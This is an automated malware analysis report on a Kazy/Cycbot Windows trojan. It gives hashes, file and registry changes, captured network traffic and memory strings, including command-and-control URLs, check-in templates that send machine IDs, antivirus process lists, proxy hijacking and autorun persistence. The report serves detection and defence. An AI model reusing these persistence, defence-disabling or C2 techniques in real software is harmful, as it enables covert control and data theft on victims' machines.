Gen.Variant.Kazy.43312_57ffb149a9

by malwarelabrobot on October 5th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.43312 (B) (Emsisoft), Gen:Variant.Kazy.43312 (AdAware), Trojan.Win32.Alureon.FD, BackdoorCycbot.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 57ffb149a9e5fc82a9e95c5a7e080403
SHA1: a39f7e9db56dc84a664b761c06cf9193c909a40d
SHA256: 563c25f9fc89aa874087ddfa75eb47d118841da7c704dda6d14540de65669c44
SSDeep: 3072:zXlGX2x SbkAyRbEPJkBvrqUIYB8OkS2 lvfW62xbpC27d1a:z1k2cSmgPJkBzE2Ij lv4JJ1
Size: 178176 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: BND
Created at: 2005-09-20 12:38:39
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mscorsvw.exe:1912
%original file name%.exe:1520
%original file name%.exe:668

The Trojan injects its code into the following process(es):

%original file name%.exe:464

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%System%\config\SOFTWARE.LOG (3782 bytes)
%System%\config\software (1617 bytes)
%Program Files%\LP\D1F5\C29.exe (170514 bytes)
%Program Files%\LP\D1F5\85.exe (43 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (5028 bytes)

The Trojan deletes the following file(s):

%Program Files%\LP\D1F5\85.exe (0 bytes)

Registry activity

The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"

The process %original file name%.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 03 00 00 00 14 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:58848"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 5B 48 37 3B 9E D8 BA D4 48 1A E3 06 DA 5E 66"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"C29.exe" = "%Program Files%\LP\D1F5\C29.exe"

Automatic startup of the following service is disabled:

[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start" = "3"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

The process %original file name%.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 51 FD B7 7E 8E 2B E1 AE A2 FD 23 EF 1E C9 B4"

The process %original file name%.exe:668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 38 24 2F F8 74 7B 13 96 B3 F8 E0 B0 AA FA E6"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 243983 96768 4.8985 2796eb59f246576ca23b00c6b3a89727
.rdata 249856 1840 2048 3.80927 05f2849ddbbbbdb5e053cd11c3c9c844
.data 253952 77496 77824 5.54176 1ef9c31a5e581d9040627c48b2259026
.rsrc 331776 4096 512 0.216559 3b1ab596aa402a016cc0aac6b66acb4d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://e6845.ce.akamaiedge.net/pca3-g2.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2009.crl
hxxp://e6845.ce.akamaiedge.net/pca3.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2009-2.crl
hxxp://engineeringcrossing.com/images/misc/23525.png?pr=gHZutDyMv5rJeTTia9nrmsl6giWz+JZbVyA= 74.120.248.79
hxxp://storetabletpcforme.com/logo.png?tq=gL5HtzoYwLzEpUb5fU3HxcW7APM6EsazybMRtyFa0umG8Ar0SsSA/gSoSEU=&pr=41 141.8.225.80
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 184.84.243.34
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt 184.84.243.34
hxxp://crl.verisign.com/pca3-g2.crl 23.9.117.163
hxxp://csc3-2009-crl.verisign.com/CSC3-2009.crl 23.9.117.163
hxxp://crl.verisign.com/pca3.crl 23.9.117.163
hxxp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl 23.9.117.163
ourthreedomains.com 50.116.35.251


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Bifrose/Cycbot Checkin 2
ET TROJAN Kazy/Kryptor/Cycbot Trojan Checkin 2
ET MALWARE Lowercase mozilla/2.0 User-Agent Likely Malware

Traffic

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Connection: close
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT
Accept-Ranges: bytes
ETag: "805a83f2b9cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 56928
Cache-Control: max-age=4802
Date: Sat, 04 Oct 2014 03:41:07 GMT
Connection: close
X-CCC: US
X-CID: 2
MSCF....`.......,...................I.................,E.Y .authroot.s
tl..Y-..8..CK...<T...g.v!M.d..f.%d..}K..5..F. ...T..%.,YJ.,!T......
_..x.<=O.....yy....;3..>.|..~..\.....|......;..8..~.za...."A...q
.......g..m......<X........j"I........!..-w.....w....P...H..(.?}..2
.N. .u..a. ...=.C..D.F>rC.. ..|).=.. ..3b.8H.M...(...u8.%...W.g...\
YB.m:.....dE.........V....$....Dn:....0...S."...o..q.....K...I..K...(x
%....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,
....`0$z.@..&.x"....T..H...<........~..E..".....<<.\B(.......
[email protected]/"...f.......k..Jm7j....R.5q....Rz.
.!@...].......Y.[........4.. .D8..&...t.J^O..Q.._..1.J.m5<'k.,....%
T....i.\.;.;q..S./ 8.?Bu.............}D.Q....L....*..[.."e......15m...
_.0.M........#..v!..<...@..?sc.y....*.....tX[........{.W4.Q...^u@..
*..QP.......~.L9N....2r...4.....B..-\(...b.d...K...O.8..Un.......V.<
;.......A...V.....(..s..f..q.{N0.hS.,..;M.|G|[email protected].._.....7._6...C.0...
A;L....%...M=Y.....f.JV.(.5.....0..?*...KZ....jM...8.6U...#...ew.?..?.
..........WE.Or..O>..{.'[email protected]}.o:?~....]&l
t;!...%....}@.d...L.p.a.g ..K."..N1!%..S.bT.H.-.....e..`.0$...0t..DX..
{.....#./...8.5..M...T.......D......V\C.zy.....3E:..>.{..).QW......
q....9..n..1....8%,.........r.p@.>. ...Q.?.p..7.?..7...&..!........
.`. .=....Sf..q.l.A.....L...t.}g..;...f....=.e.~.z....C..*R....H-..=..
.f..(t'.."....F...g._....n.J..U.4vr`}.....1..o@.....@.#...R. L8....z..
].|......3..y..-./....K..6{...s.<R`.}[email protected]....
<<< skipped >>>


GET /images/misc/23525.png?pr=gHZutDyMv5rJeTTia9nrmsl6giWz+JZbVyA= HTTP/1.0
Connection: close
Host: engineeringcrossing.com
Accept: */*
User-Agent: chrome/9.0


HTTP/1.1 301 Moved Permanently
Date: Sat, 04 Oct 2014 03:41:05 GMT
Server: Apache
Location: hXXp://VVV.engineeringcrossing.com/images/misc/23525.png?pr=gHZutDyMv5rJeTTia9nrmsl6giWz%2BJZbVyA%3D
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-4a78f84f=c0a81ea8:0; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.engineeringcrossing.com/image
s/misc/23525.png?pr=gHZutDyMv5rJeTTia9nrmsl6giWz%2BJZbVyA%3D">h
ere</a>.</p>.</body></html>...



GET /CSC3-2009.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "59cf8aaa705825d86a65b6a89eacbd53:1412370312"
Last-Modified: Fri, 03 Oct 2014 21:05:12 GMT
Date: Sat, 04 Oct 2014 03:41:01 GMT
Content-Length: 2249
Connection: keep-alive
Content-Type: application/pkix-crl
0...0......0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0
...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.v
erisign.com/rpa (c)091.0,..U...%VeriSign Class 3 Code Signing 2009 CA.
.141003210002Z..141017210002Z0...0!.....zOR.D...,oMa...090525061903Z0!
......t.o=(..(..G...090520231844Z0!... ....M...m.Q.&...090517075442Z0!
...T.Ay(..U...:_|...090608072333Z0!... .(.....F..9.....090805090059Z0!
.......P..._}..;.x..090714150126Z0!.....5=.qOV[.cyg.&..090528172131Z0!
...K...=$.6.........090521015930Z0!...-H...D...tDXUN...090527062050Z0!
.......-.'@..<B{....090525110212Z0!......x..m*[.7.h#"..090702070220
Z0!.....%.o.....kT.....090527062152Z0!..!.*;....)..Ef..k..090529084018
Z0!..#.}h..."..........090527050204Z0!..$.I^./@.:7.p.,v...090521201736
Z0!..&.5{.....Q;D......090521184343Z0!..&...T[.~y.........090903081104
Z0!...q..m...G..i^.....090521025017Z0!../a.nS..[lA.lCB....090527045238
Z0!..0.....R..iX.px....090605052910Z0!..2.h..).n......p;..090713144756
Z0!..:.............. ..090605052934Z0!..;.0.*.v..*....P...090601001940
Z0!..?..}p 2I..o.\[email protected]`......l..090527022214
Z0!..B..h~a..]..L.2....100512125735Z0!..B.U..ZF...........090527041620
Z0!..F'....?xxnx.6Q....090528003453Z0!..F|A..r....#.@.&...090527062259
Z0!..L.r....F..^..i.t..090608130549Z0!..Q...Y...Exm.._7...090520225737
Z0!..TH..~.. ..({......090723115618Z0!..U.59Z..[.G.RmyR1..090527071534
Z0!..V ].h.../".V<8-...090611075746Z0!..gHT...j5zdG....K..090521205
535Z0!..mje.......;.......090521012215Z0!..p^..E.{.>.........09
<<< skipped >>>


GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Connection: close
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT
Accept-Ranges: bytes
ETag: "80179bc4b3cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=7578
Date: Sat, 04 Oct 2014 03:41:07 GMT
Connection: close
X-CCC: US
X-CID: 2
1401CFCEB3C4C42958..



GET /logo.png?tq=gL5HtzoYwLzEpUb5fU3HxcW7APM6EsazybMRtyFa0umG8Ar0SsSA/gSoSEU=&pr=41 HTTP/1.0
Host: storetabletpcforme.com
User-Agent: mozilla/2.0
Connection: close


HTTP/1.1 200 OK
Date: Sat, 04 Oct 2014 03:41:05 GMT
Server: Apache
Set-Cookie: gvc=926vr1599396656812223; expires=Thu, 03-Oct-2019 03:41:05 GMT; path=/; domain=storetabletpcforme.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 51
Keep-Alive: timeout=5, max=124
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --><
;/body></html>..



GET /CSC3-2009-2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-2-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "08c6e8a5774f36e8e5af9559193298fc:1412370311"
Last-Modified: Fri, 03 Oct 2014 21:05:11 GMT
Date: Sat, 04 Oct 2014 03:41:04 GMT
Transfer-Encoding:  chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
00006000..0..N0..6...0...*.H........0..1.0...U....US1.0...U....VeriSig
n, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at htt
ps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signin
g 2009-2 CA..141003210001Z..141017210001Z0...0!.....V..t..'.F(z....121
202220203Z0!.... .;...9.7.......090826054212Z0!...\.)../F..^p..s...100
722072726Z0!......P....A.x......100708154305Z0!.......O#.`n.5j.9...100
930040708Z0!..../..8~p...h......091006052837Z0!.....(../L....--aK..091
029040207Z0!...aW.....B.!.0..t..090909121104Z0!...g,..4(vv....mJ_..100
514054218Z0!.....V.....(..-..p..090826162211Z0!....O..,J.N.n...Ly..091
[email protected]!.........}..Dt...!..090
922192227Z0!.......2l....7i..?..101109030426Z0!.....p%...l,AogP....100
523060224Z0!...,.P.C......*.....100303082219Z0!...NRPL.............100
413090225Z0!....1w....d.&..8....091026111702Z0!......F....e........090
608081352Z0!.....6..d6.7..4.....100924123027Z0!....$..*...s..&s....100
219210742Z0!......Q_.G..|.......091009145530Z0!........>..O...=72..
100616160934Z0!....Xlm$|".su.......090619194406Z0!......J)..E......C..
100922142243Z0!...D......u.y.Iy{k..101026130323Z0!...El...)>..W..&l
t;K...101004225456Z0!...p..wy.i.zc...X...091117001921Z0!.....,{..^....
......091203194409Z0!....B....d...*[email protected]!.......m. .V..
...~..101111134216Z0!...2.R.i.{..........091029071123Z0!...`F..q2..O.:
......100602074221Z0!...a{.-...@...'.....100723194022Z0!........fW.y.,
s.....101011182226Z0!....Um..}.8)........100324085953Z0!....,u.box
<<< skipped >>>


GET /pca3-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "093ce4619add4c7ee1ce20e2c8e1ec38:1411605011"
Last-Modified: Thu, 25 Sep 2014 00:30:11 GMT
Date: Sat, 04 Oct 2014 03:41:01 GMT
Content-Length: 1415
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1<0
:..U...3Class 3 Public Primary Certification Authority - G21:08..U...1
(c) 1998 VeriSign, Inc. - For authorized use only1.0...U....VeriSign T
rust Network..140922000000Z..141231235959Z0...0!...=...X.FL...3..I..08
0403173458Z0!...SJs|.."E.G.......070412172616Z0!....E........W6.n...14
0129192923Z0!.......jvO..!....]..040401180422Z0!......\*....bO-.....08
0403173459Z0!....I..:.<....9..m..070412172523Z0!.........R.E!..=t..
.070522172634Z0!....}.....}.}.(q.C..040401180606Z0!...`.6..,...u.~x.:.
.080403173459Z0!.........wX.....~...080606171636Z0!..$.Jn>.t..d_j..
."..040401180518Z0!.. ..N*(.}H..j......070412172308Z0!.. ..3.J......d.
.9..070522172711Z0!..50.h.:....s.K"....040401180542Z0!..7_f...s.......
....080403173459Z0!..<.J..y..)..~x7.e..080606171735Z0!..NS.c.f.....
.7.p...070412172213Z0!..N.k;..-...9J..-...070522172748Z0!..Q..2pRv.WC.
:..f...030109181346Z0!..Tq..m..*..........140129192925Z0!..^..CX4.3...
 F.R...070522172548Z0!..^..)..P3...7...L..080403173459Z0!..e........O.
^.S....080403173457Z0!..jP....Wv..[.v.5H..070412172102Z0!..nk.l.!y.~..
[email protected]!..r.q.I-Ln./........080403173458Z0!..t8....D....
.......080606171524Z0!..t.xn.tS....O_.....070412171951Z0!..v......Qnw.
.W.g...140129192921Z0...*.H.............."{.v=]j..k?.....h.f..........
.u.R.....dZ,aTG<.i.R.e..J.....rZ .."...S_RS~..Ezi.Od..Y..1...D...'.
........%.7.lk.Z%^....?.`....M....
<<< skipped >>>

GET /pca3.crl HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "8f6b3bcd9bb64555001fba64f5b01b92:1411517716"
Last-Modified: Wed, 24 Sep 2014 00:15:16 GMT
Date: Sat, 04 Oct 2014 03:41:04 GMT
Content-Length: 933
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U
....Class 3 Public Primary Certification Authority..140922000000Z..141
231235959Z0..x0!...v....a_>..2......020924164823Z0!.....A.....{2..Y
.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y..q.....
..fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!............R
.e.53..010207212458Z0!..!......Y...ISi....010706171411Z0!..$-..I{r....
u<._...080403172226Z0!..&.."?..y..51}..1..010706172118Z0!..4....2..
..{W......080605175030Z0!..B....c............070411175910Z0!..H.Py...N
....* [email protected]!..Y......w
`G........070411175657Z0!..Z`[email protected].*q..080403172017Z0!..l....I..
.Y..] .c..010706171749Z0"......T=deQ...1u.]...010207212247Z0".....p..1
..7<.....e..010207211822Z0...*.H............M....s#..Lo...TU...tM.3
...'.U......:Z...w.x.=....K.0;...!....D....9...,!....B.t. <........
..-.....k.$<i{O.<.E...*.......Ow _..J...

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_464:

`.rsrc
`.pC4
u.Vht
SSShbU@
SSj%S
<%u,V
<3%u1f
uTVWh.IB
GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\sc.exe
ntdll.dll
iexplore.exe
opera.exe
firefox.exe
safari.exe
chrome.exe
AVGIDSMonitor.exe
AVGIDSAgent.exe
avgchsvx.exe
avgemcx.exe
avgnsx.exe
avgrsx.exe
avgtray.exe
avgwdsvc.exe
avgnt.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
explorer.exe
Windows Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
at %d:%d "%s" %s
win32iexplore.exe
win32opera.exe
win32firefox.exe
win32safari.exe
win32winword.exe
win32excel.exe
win32outlook.exe
win32photoshop.exe
win32wmplayer.exe
win32java.exe
win32itunes.exe
win32msmsgs.exe
java.exe
*.log
%s:\windows\system32\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\syswow64\%s.tmp
Find Temporary files is %d
cannot open files %s, Open next files ?
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
\Windows NT
Software\Microsoft\Windows\CurrentVersion\Run
%s\%s
%s.%s
stor.cfg
exec%s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
hXXp://
POST %s HTTP/1.1
Host: %s
User-Agent: mozilla/2.0
Content-Length: %u
POST hXXp://%s%s HTTP/1.1
HTTP/1.0 200 OK
HTTP/1.1 200 OK
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=109
%s_%s_%d
_1_%d
_2_%d
_3_%d
_4_%d
hXXp://ourthreedomains.com
hXXp://webhomefordomains.com
hXXp://storetabletpcforme.com
hXXp://seeworldonlines.com
hXXp://adreklamaforyou.com
hXXp://calcfordelis.com
hXXp://stotre4image.com
hXXp://allsoft4you.com
hXXp://videocontainer.com
hXXp://maxtroeurosys.com
SELECT_RESERV_SRV_%d
%s_%d_%s
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d
%s %s
%s start%s%c%s
c1.exe
c2.exe
c3.exe
%sq=%s
DWN_CON_STRP_%d_%s
hXXp://%d.ctrl.%s
logo.png
img/135.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?tq=%s&pr=%d
%s:%d/%s?tq=%s&pr=%d
hXXp://armoredlegion.com/305986.png
hXXp://armoredlegion.com/16354.png
hXXp://armoredlegion.com/716354_m61.png
hXXp://mektek.net/thelab/wiley.jpg
hXXp://knowledgesutra.com/img/temp/hi.cgi
hXXp://knowledgesutra.com/img/temp/head.png
hXXp://battleon.com/134.gif
hXXp://battleon.com/132.gif
hXXp://battleon.com/133.gif
hXXp://browsermmorpg.com/images/cpc.png
hXXp://browsermmorpg.com/images/cpc2.png
hXXp://browsermmorpg.com/img/intel.gif
hXXp://browsermmorpg.com/img/intel.jpg
hXXp://012webpages.com/christian12.jpg
hXXp://012webpages.com/christian13.jpg
hXXp://012webpages.com/christian14.jpg
hXXp://tri-countymech.com/g/livechat.png
hXXp://tri-countymech.com/g/logo.png
hXXp://tri-countymech.com/g/133.jpg
hXXp://tri-countymech.com/g/134.jpg
hXXp://electronicstheory.com/pics/valley.png
hXXp://electronicstheory.com/pics/sun.png
hXXp://classicbattletech.com/lhous3.gif
hXXp://classicbattletech.com/lhous4.gif
hXXp://classicbattletech.com/lhous5.gif
hXXp://classicbattletech.com/lhous6.gif
hXXp://engineeringcrossing.com/images/misc/23525.png
hXXp://engineeringcrossing.com/images/misc/64646.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
%s?pr=%s
\bl%d_64.bat
del "%s"
if exist "%s" goto a
cmd.exe /c "%s"
%s.zl
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
GET %s HTTP/1.0
drweb
{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
ldr.ini
reportfrommains.com
hXXp://%s/s.php?c=121&id=%s
onlinereportsystem.com
%s_1_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
u.exe
%s up%s
&%s=%s
PRM_LSTN_THIS_PORT
127.0.0.1
HTTP/1.x
google.com
hXXp://VVV.google.com
HTTP/1.1 302 Found
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Opera
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.google
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
&useragent=%s
&referer=%s
&type=%d
%s:443/?ver=109&system=%d&id=%s&hwid=%s&search=%s
%s_2_%s
%s_%s_%s
%s_3_%s
VVV.VVV.ru
hXXps://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
User-Agent: chrome/9.0
%s %s %s
hXXp://VVV.google.com/
hXXp://VVV.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
zcÁ
c:\%original file name%.exe
%Program Files%\CF2C6
%Documents and Settings%\%current user%\Application Data\507CF
%Program Files%\LP\D1F5
GetCPInfo
GetProcessHeap
RegCreateKeyExA
RegCloseKey
RegOpenKeyExA
RegFlushKey
ShellExecuteA
SHDeleteKeyA
keybd_event
EnumChildWindows
EnumWindows
WinHttpOpenRequest
WinHttpQueryDataAvailable
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReadData
WinHttpOpen
.text
`.rdata
@.data
.rsrc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
RASAPI32.dll
RPCRT4.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
\Registry\Machine\System\CurrentControlSet\Services\%s
Dr.Web
mhttp=127.0.0.1:%d
hXXp://VVV.yahoo.com
2.0.2.1

%original file name%.exe_464_rwx_001D5000_00001000:

ey.net
ram Files\LP\D1F5\85.pif
Tcpip

%original file name%.exe_464_rwx_00400000_0004F000:

`.rsrc
`.pC4
u.Vht
SSShbU@
SSj%S
<%u,V
<3%u1f
uTVWh.IB
